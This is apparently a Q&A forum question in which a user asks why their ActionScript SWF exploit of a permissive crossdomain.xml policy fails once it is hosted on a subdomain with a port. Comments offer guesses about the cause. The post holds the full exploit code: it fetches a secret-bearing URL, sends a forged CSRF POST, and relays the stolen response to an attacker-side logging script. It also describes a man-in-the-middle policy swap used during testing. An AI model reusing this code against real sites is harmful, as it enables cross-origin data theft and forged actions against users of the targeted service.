0

I am using an SWF generated from the following action script to make cross origin calls from the SWF hosted on http://something.subdomain.victim.com:8000/ to http://victim.com/a?secret=test.

https://victim.com has a permissive crossdomain.xml at https://victim.com/crossdomain.xml as given below.

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy 
  SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*.victim.com" />
</cross-domain-policy>

Action Script

// Adaptation of an exploit by John M as defined in 
// https://medium.com/@x41x41x41/exploiting-crossdomain-xml-missconfigurations-3c8d407d05a8
// PHP serverside is replaced with a simpler python cgi. Thanks to trustedsec

package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLVariables;
 import flash.net.URLLoader;
 import flash.net.URLLoaderDataFormat;

 public class crossDomain extends Sprite {
  public function crossDomain() {

   // Fetching secret.

   var firstrequest:URLRequest = new URLRequest("https://victim.com/a?secret=test");
   var firstloader:URLLoader = new URLLoader();
   firstloader.addEventListener(Event.COMPLETE, completeHandler);
   try {
    firstloader.load(firstrequest);
   } catch (error: Error) {
    trace("Unable to load URL: " + error);
   }

   // Performing CSRF with a POST 

   var secondvariables:URLVariables = new URLVariables("a=test1&b=test2&c=test3&final=nothing");
   var secondrequest:URLRequest = new URLRequest("http://victim.com/someaction.html");
   secondrequest.method = URLRequestMethod.POST;
   secondrequest.data = secondvariables;
   var secondloader:URLLoader = new URLLoader();
   secondloader.dataFormat = URLLoaderDataFormat.VARIABLES;
   try {
    secondloader.load(secondrequest);
   } catch (error: Error) {
    trace("Unable to load URL");
   }

  }

  private function completeHandler(event: Event): void {

   // Retreiving the HTTP responses to attacker server.

   var request:URLRequest = new URLRequest("http://something.subdomain.victim.com:8000/cgi-bin/postlogger.py");
   var variables:URLVariables = new URLVariables();
   variables.data = event.target.data;
   request.method = URLRequestMethod.POST;
   request.data = variables;
   var loader:URLLoader = new URLLoader();
   try {
    loader.load(request);
   } catch (error: Error) {
    trace("Unable to load URL");
   }
  }
 }
}
  1. I tested this code locally by configuring localhost as victim origin which serves a wildcard crossdomain.xml [<allow-access-from domain="*" />]
    1. 127.0.0.1 as an attacker origin which serves crossDomain.swf
    2. The swf worked exactly as it is intended to requesting crossdomain.xml first followed by calls to the two URLs on origin localhost defined in the actionscript.
    3. However when hosting this on http://something.subdomain.victim.com:8000, the first step where it is retrieving the crossdomain.xml from https://victim.com/crossdomain.xml is happening. However the further requests are not.
    4. To ensure that it is not a crossdomain policy issue. I did a Man-In-The-Middle and replaced the <allow-access-from domain="*.victim.com" /> with <allow-access-from domain="*" />.
    5. So at this stage, as far as the browser is concerned, the crossdomainxml for victim.com is a *. Yet further requests are not happening.

I can't find a potential reason for this confusing behavior. I am an actionscript noob. Any pointers on why this is happening would be highly appreciated.

hax
  • 282
  • 1
  • 17
  • Just a wild guess, **http://something.subdomain.victim.com:8000/** should also have its own copy of **crossdomain.xml**. I think permit to the main domain does not automatically permit requests to sub-domains. – Organis Oct 05 '19 at 11:46
  • @organis something.subdomain.victim.com:8000 is where the exploit is hosted. It is the source origin. It having own cross domain policy should not govern requests to victim.com, right? – hax Oct 05 '19 at 15:02
  • You said the SWF is hosted at http://127.0.0.1/ – Organis Oct 05 '19 at 16:23
  • Perhaps I was not clear. The last part is about how I made sure that it isn't a code error – hax Oct 05 '19 at 16:23
  • Please read the points 1 through towards the end of the question. – hax Oct 05 '19 at 16:25
  • I quite understand that it is not a code error, it's a security thing. The problem might be in the fact your SWF starts not only from sub-domain, but also from specified port. Seems this problem is similar: https://stackoverflow.com/questions/14501071/flash-policy-file-not-working-same-domain-different-port – Organis Oct 05 '19 at 17:22

0 Answers0